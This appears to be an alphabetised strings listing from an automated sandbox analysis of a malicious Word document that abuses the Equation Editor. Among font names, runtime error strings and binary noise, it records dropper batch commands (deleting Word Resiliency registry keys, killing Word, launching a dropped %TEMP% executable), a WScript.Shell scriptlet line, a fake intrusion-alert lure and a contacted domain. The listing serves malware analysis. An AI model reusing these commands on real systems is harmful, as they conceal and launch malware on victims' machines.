Ansi based on Dropped File (~WRC0000.tmp)

QXV*MvL$r3IC4Yux\7W)5PV4W8in]h+[P2#4kxj/Sx6IzDYf]4JtR5CIr4XiV +9Hd<HAS~Ol}gJer1Wo1esT5#:QQt1OJs:SSfLejtk7Ds3

Ansi based on Dropped File (decoy.doc)

R!y+Un;*&/HrT>>\

Ansi based on Dropped File (~WRC0000.tmp)

R&ight

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

R6002- floating point not loaded

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

R6008- not enough space for arguments

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

R6009- not enough space for environment

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

R6016- not enough space for thread data

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

R6017- unexpected multithread lock error

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

R6018- unexpected heap error

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

R6019- unable to open console device

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

R6024- not enough space for _onexit/atexit table

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

R6025- pure virtual function call

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

R6026- not enough space for stdio initialization

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

R6027- not enough space for lowio initialization

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

R6028- unable to initialize heap

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

r__?J___m_

Ansi based on Image Processing (screen_0.png)

Raavi

Unicode based on Runtime Data (WINWORD.EXE )

RadicalGap

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

Rage Italic

Unicode based on Runtime Data (WINWORD.EXE )

RaiseException

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

Ravie

Unicode based on Runtime Data (WINWORD.EXE )

Reduced-size vertical fraction

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Resiliency /f

Ansi based on Process Commandline (reg.exe)

reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Word\Resiliency /f

Ansi based on Process Commandline (reg.exe)

reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Resiliency /f

Ansi based on Process Commandline (reg.exe)

reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency /f

Ansi based on Process Commandline (reg.exe)

reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Word\Resiliency /f

Ansi based on Process Commandline (reg.exe)

reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency /f

Ansi based on Process Commandline (reg.exe)

reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Word\Resiliency /f

Ansi based on Process Commandline (reg.exe)

reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Resiliency /f

Ansi based on Process Commandline (reg.exe)

REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\10.0\Word\File MRU" /v "Item 1"

Ansi based on Process Commandline (reg.exe)

REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\11.0\Word\File MRU" /v "Item 1"

Ansi based on Process Commandline (reg.exe)

REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\12.0\Word\File MRU" /v "Item 1"

Ansi based on Process Commandline (reg.exe)

REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\14.0\Word\File MRU" /v "Item 1"

Ansi based on Process Commandline (reg.exe)

REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Word\File MRU" /v "Item 1"

Ansi based on Process Commandline (reg.exe)

REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\File MRU" /v "Item 1"

Ansi based on Process Commandline (reg.exe)

REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\8.0\Word\File MRU" /v "Item 1"

Ansi based on Process Commandline (reg.exe)

REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\9.0\Word\File MRU" /v "Item 1"

Ansi based on Process Commandline (reg.exe)

reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Resiliency /f

Ansi based on Dropped File (2nd.bat)

reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Word\Resiliency /f

Ansi based on Dropped File (2nd.bat)

reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Resiliency /f

Ansi based on Dropped File (2nd.bat)

reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency /f

Ansi based on Dropped File (2nd.bat)

reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Word\Resiliency /f

Ansi based on Dropped File (2nd.bat)

reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency /f

Ansi based on Dropped File (2nd.bat)

reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Word\Resiliency /f

Ansi based on Dropped File (2nd.bat)

reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Resiliency /f

Ansi based on Dropped File (2nd.bat)

regedit /s

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

RegisterInsituClass Failed

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

REListbox20W

Unicode based on Runtime Data (WINWORD.EXE )

remotable="true"

Ansi based on Dropped File (inteldriverupd1.sct)

Rewim

Ansi based on Image Processing (screen_6.png)

ri&x-Vector

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

ri_cn_pati_i_it_,.'

Ansi based on Image Processing (screen_3.png)

Rich Text Format

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Rifirinci_

Ansi based on Image Processing (screen_3.png)

Right braceSimilar to

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Riviiw

Ansi based on Image Processing (screen_3.png)

rix...

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

RMirincic

Ansi based on Image Processing (screen_6.png)

Rockwell

Unicode based on Runtime Data (WINWORD.EXE )

Rockwell Condensed

Unicode based on Runtime Data (WINWORD.EXE )

Rockwell Extra Bold

Unicode based on Runtime Data (WINWORD.EXE )

RtlUnwind

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

RuK>V.EL+M2#'fi~Vvl{u8zH

Ansi based on Dropped File (~WRC0000.tmp)

runtime error

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

Runtime Error!Program:

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

s Control Panel window

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

S*NLsRb_mTnL)H%x@h@UnknownG*AxTimes New Roman5Symbol3.*CxArial7.@CalibriA$BCambria Math"1hb5scg;;!n0KHP$PLsR2!xxFijiFijiOh+'0l

Ansi based on Dropped File (decoy.doc)

S/$0O:QbgH(AZ[n)B(#1TJ4~%&.U]_oQh;;l]-e!2Y)?yh\e?e,OUxB*sP}br>aM|XKdPK!)H w>#word/glossary/stylesWithEffects.xml[r8}SR{Iv3-1'%N-KX#v_yq"d8wGoCOD8w:Ie+O"I_}8 L.7w7i]Ke"O^2^

Ansi based on Dropped File (~WRC0000.tmp)

s666666666vvvvvvvvv666666>6666666666666666666666666666666666666666666666666hH66666666666666666666666666666666666666666666666666666666666666666p62&6FVfv2(&6FVfv&6FVfv&6FVfv&6FVfv&6FVfv&6FVfv8XV~ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@ OJPJQJ_HmHnHsHtHL`L1KG=K9dCJ_HaJmHsHtHh@2hx03>;>2>: 3ddd@&[$\$5CJOJPJQJ\aJtHBA B

Ansi based on Dropped File (decoy.doc)

S; Z~!P9giC!#B,;X=,I2UWV9$lk=Aj;{AP79|s*Y;[MChf]o{oY=1kyVV5E8Vk+\80X4D)!!?*|fv

Ansi based on Dropped File (~WRC0000.tmp)

S?3~`Yg

Ansi based on Dropped File (decoy.doc)

s__g,.

Ansi based on Image Processing (screen_3.png)

Sakkal Majalla

Unicode based on Runtime Data (WINWORD.EXE )

Save changes to %s?

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

SavedLegacySettings

Unicode based on Runtime Data (WINWORD.EXE )

Script

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

Script MT Bold

Unicode based on Runtime Data (WINWORD.EXE )

scription

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

ScriptScript

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

SCROLLBAR

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Sd\17pa>SR!

Ansi based on Dropped File (~WRC0000.tmp)

sDecimal

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Segoe Print

Unicode based on Runtime Data (WINWORD.EXE )

Segoe Script

Unicode based on Runtime Data (WINWORD.EXE )

Segoe UI

Unicode based on Runtime Data (WINWORD.EXE )

Segoe UI Light

Unicode based on Runtime Data (WINWORD.EXE )

Segoe UI Semibold

Unicode based on Runtime Data (WINWORD.EXE )

Segoe UI Symbol

Unicode based on Runtime Data (WINWORD.EXE )

server

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Set ObjShell = CreateObject("WScript.Shell")

Ansi based on Dropped File (inteldriverupd1.sct)

Set ObjShell = Nothing

Ansi based on Dropped File (inteldriverupd1.sct)

set uu="%TMp%\block.txt"

Ansi based on Dropped File (task.bat)

SetEndOfFile

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

SetErrorMode

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

SetFileAttributesW

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.0040B000.00000080.mdmp)

SetFilePointer

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

SetUnhandledExceptionFilter

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.0040B000.00000080.mdmp)

ShawH_p__

Ansi based on Image Processing (screen_3.png)

Shonar Bangla

Unicode based on Runtime Data (WINWORD.EXE )

ShowAll

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Showcard Gothic

Unicode based on Runtime Data (WINWORD.EXE )

Shruti

Unicode based on Runtime Data (WINWORD.EXE )

Silict_

Ansi based on Image Processing (screen_3.png)

SimHei

Unicode based on Runtime Data (WINWORD.EXE )

Simplified Arabic

Unicode based on Runtime Data (WINWORD.EXE )

Simplified Arabic Fixed

Unicode based on Runtime Data (WINWORD.EXE )

SimSun

Unicode based on Runtime Data (WINWORD.EXE )

SimSun-ExtB

Unicode based on Runtime Data (WINWORD.EXE )

SING error

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

Site 1

Unicode based on Runtime Data (WINWORD.EXE )

Site 10

Unicode based on Runtime Data (WINWORD.EXE )

Site 11

Unicode based on Runtime Data (WINWORD.EXE )

Site 12

Unicode based on Runtime Data (WINWORD.EXE )

Site 13

Unicode based on Runtime Data (WINWORD.EXE )

Site 14

Unicode based on Runtime Data (WINWORD.EXE )

Site 15

Unicode based on Runtime Data (WINWORD.EXE )

Site 16

Unicode based on Runtime Data (WINWORD.EXE )

Site 17

Unicode based on Runtime Data (WINWORD.EXE )

Site 18

Unicode based on Runtime Data (WINWORD.EXE )

Site 19

Unicode based on Runtime Data (WINWORD.EXE )

Site 2

Unicode based on Runtime Data (WINWORD.EXE )

Site 20

Unicode based on Runtime Data (WINWORD.EXE )

Site 3

Unicode based on Runtime Data (WINWORD.EXE )

Site 4

Unicode based on Runtime Data (WINWORD.EXE )

Site 5

Unicode based on Runtime Data (WINWORD.EXE )

Site 6

Unicode based on Runtime Data (WINWORD.EXE )

Site 7

Unicode based on Runtime Data (WINWORD.EXE )

Site 8

Unicode based on Runtime Data (WINWORD.EXE )

Site 9

Unicode based on Runtime Data (WINWORD.EXE )

SizeDlgProc

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

SizeofResource

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

Sizes

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Sleep

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.0040B000.00000080.mdmp)

sList

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Small Fonts

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Small Fontsman

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

SmallLargeIncr

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

Smile

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Snap ITC

Unicode based on Runtime Data (WINWORD.EXE )

SNle_

Ansi based on Image Processing (screen_3.png)

SNlgt

Ansi based on Image Processing (screen_6.png)

Software\Microsoft\Equation Editor\3.0\Options

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Software\Microsoft\Office\Common\8.0\Command Bars\ButtonSize

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Software\Microsoft\Shared

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Spacing

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

SpacingFactor

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

SpacingWindow

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

StaleIETldCache

Unicode based on Runtime Data (WINWORD.EXE )

start %TeMp%\ExE.ExE

Ansi based on Dropped File (2nd.bat)

StatBarFrame

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Stencil

Unicode based on Runtime Data (WINWORD.EXE )

StringFileInfo

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Style

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

StyleDefDlogProc

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

StyleOtherDlgProc

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

Styles

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

stylesheet

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

Sub-Sy&mbol

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

SubFractBarThick

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

Subscript

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

SubscriptDepth

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

SubSymbol

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

SunMonTueWedThuFriSat

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

SuperscriptHeight

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

Sylfaen

Unicode based on Runtime Data (WINWORD.EXE )

Symbol

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

symbol

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

SymbolSub-symbol

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

system\currentcontrolset\control\keyboard layout

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

S{G$FTbGhd,Jy&XwfZjfdG[kuRADi*(XxlTB

Ansi based on Dropped File (~WRC0000.tmp)

t and character style)Applies Function font and character style)Applies Variable font and character style&Applies Greek font and character style.Applies Matrix-Vector font and character style.Applies a font directly - without using styles

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

t6v[r_\,Wyl5SZR.ydzm<[. [G"(cV-wrUnso;nYJk[\3NqK^&"O![=g)v/Qswza@qh0[\M)1?V#m{Xe}\^yXwC\`obg$~"i77Jc

Ansi based on Dropped File (~WRC0000.tmp)

Tahoma

Unicode based on Runtime Data (WINWORD.EXE )

taskkill /f /im WiNwOrD.ExE

Ansi based on Process Commandline (taskkill.exe)

taskkill /f /im WiNwOrD.ExE

Ansi based on Dropped File (2nd.bat)

Tempus Sans ITC

Unicode based on Runtime Data (WINWORD.EXE )

TerminateProcess

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

ternalName

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

test1.ru

Ansi based on PCAP Processing (PCAP)

Text style

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

TextFE

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

TextLanguage

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

the application windowNot available - the window is zoomed to its maximum size

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

the Equation Editor version and copyright

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

the equation or quit Equation Editor%Undo, delete, copy, insert, or select0Choose zoom percentage and other display options7Align piles of lines, modify matrices or define spacing2Apply fonts and styles or change style definitions'Apply sizes and change size definitions!Get help on using Equation Editor

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

The following attacks coming from your network space was logged by IBM Intruder Detection System.

Ansi based on Dropped File (decoy.doc)

This Certificate may only be relied upon by Relying Parties and only in accordance with the Certificate Policy found at https://letsencrypt.org/repository/0

Ansi based on PCAP Processing (network.pcap)

This equation was created with MathType. Tab-stop formatting will be lost; User 1 & 2 styles will be converted to the Text style; User 1 & 2 typesizes will be converted to the Full typesize.

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Ti%$<

Ansi based on Dropped File (exe.exe.634531026)

TIMEOUT 1

Ansi based on Process Commandline (timeout.exe)

TIMEOUT 1

Ansi based on Dropped File (2nd.bat)

Times

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Times New Roman

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Times-Bold

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

Times-BoldItalic

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

Times-Italic

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

Times-Roman

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

tion window to normal sizeNot available - the window is not maximized or minimized

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

TLDUpdates

Unicode based on Runtime Data (WINWORD.EXE )

TLOSS error

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

TlsAlloc

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.0040B000.00000080.mdmp)

Tms Rmn

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

to the file. The disk may be full.+File does not contain Equation Editor data.

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Too many windows open.#Not enough memory to open a window.KUsing tab formatting without left alignment may produce unexpected results.

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

ToolbarDocked

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

ToolbarDockPos

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

ToolbarShown

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

ToolbarWinPos

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Trademark sans serifSummation

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Traditional Arabic

Unicode based on Runtime Data (WINWORD.EXE )

Trebuchet MS

Unicode based on Runtime Data (WINWORD.EXE )

trol &panel...

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

TTIIvt]KcK#v5+|D~O@%\w_nN[L9KqgVhn

Ansi based on Dropped File (~WRC0000.tmp)

Tunga

Unicode based on Runtime Data (WINWORD.EXE )

Tw Cen MT

Unicode based on Runtime Data (WINWORD.EXE )

Tw Cen MT Condensed

Unicode based on Runtime Data (WINWORD.EXE )

Tw Cen MT Condensed Extra Bold

Unicode based on Runtime Data (WINWORD.EXE )

u"xA@T_q64)kuV7t'%;i9s9x,-45xd8?d/Y|t&LILJ`& -Gt/PK!-

Ansi based on Dropped File (~WRC0000.tmp)

U3"&$DM7q~wprB

Ansi based on Dropped File (~WRC0000.tmp)

u3KGnD1NIBs

Ansi based on Dropped File (~WRC0000.tmp)

U]b65y2izO{]rK[']u4jjKF\kIh_[][#:?W-MLiu\g ]x1<TD`C4P{T6%[yBZJ

Ansi based on Dropped File (decoy.doc)

ubscript

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

UCGreek

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

UNCAsIntranet

Unicode based on Runtime Data (WINWORD.EXE )

unction . . . . . . . . . . .

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

UnhandledException

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

UnhandledExceptionFilter

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.0040B000.00000080.mdmp)

upda_

Ansi based on Image Processing (screen_3.png)

User1

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

User2

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

user32.dll

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

uts it on the ClipboardNot available because no part of the equation is selectedkCopies the selection and puts it on the ClipboardNot available because no part of the equation is selectedpInserts the Clipboard contents at the insertion pointNot available - the Clipboard does not contain an equationsRemoves the selection without putting it on the ClipboardNot available because no part of the equation is selected

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Utsaah

Unicode based on Runtime Data (WINWORD.EXE )

uV4(Tn

Ansi based on Dropped File (~WRC0000.tmp)

uXnQh,C\/O'sd@Fk4/)x"*DI"EE@U+tbp{|VJ9`oLQ7{<-Qn"^VQ=`:n#WAroJ-W)2)"[Eyw)Yu:y]wa7G4NUn>l}2GxBP}Er$

Ansi based on Dropped File (~WRC0000.tmp)

v-%oO$u~W8kX8]nddbKzP]|{ dZGJS90_t$4aJ=yx=84)I;58 duG%*

Ansi based on Dropped File (~WRC0000.tmp)

va_uit,

Ansi based on Image Processing (screen_3.png)

VarFileInfo

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Variable

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

ve, size, or close application window

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Vector

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

Verdana

Unicode based on Runtime Data (WINWORD.EXE )

Version

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

version="1.00"

Ansi based on Dropped File (inteldriverupd1.sct)

Vijaya

Unicode based on Runtime Data (WINWORD.EXE )

Viner Hand ITC

Unicode based on Runtime Data (WINWORD.EXE )

VirtualAlloc

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

VirtualFree

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

VirtualProtect

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.0040B000.00000080.mdmp)

Vivaldi

Unicode based on Runtime Data (WINWORD.EXE )

Vladimir Script

Unicode based on Runtime Data (WINWORD.EXE )

Vrinda

Unicode based on Runtime Data (WINWORD.EXE )

VS_VERSION_INFO

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

VSA"3(O5$aE'p,#$[G)A*R~t*N7r0q^CBz8~f/1\\R+@N

Ansi based on Dropped File (~WRC0000.tmp)

W+7`gJj|h(KD-

Ansi based on Dropped File (~WRC0000.tmp)

W^B_.u;;XD";Q6LquhS6Y3G2C@tn*fvu;B3u

Ansi based on Dropped File (decoy.doc)

Ward_:O

Ansi based on Image Processing (screen_6.png)

Webdings

Unicode based on Runtime Data (WINWORD.EXE )

Wide Latin

Unicode based on Runtime Data (WINWORD.EXE )

WideCharToMultiByte

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

window is zoomed to its maximum size

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Windows

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

WinExec

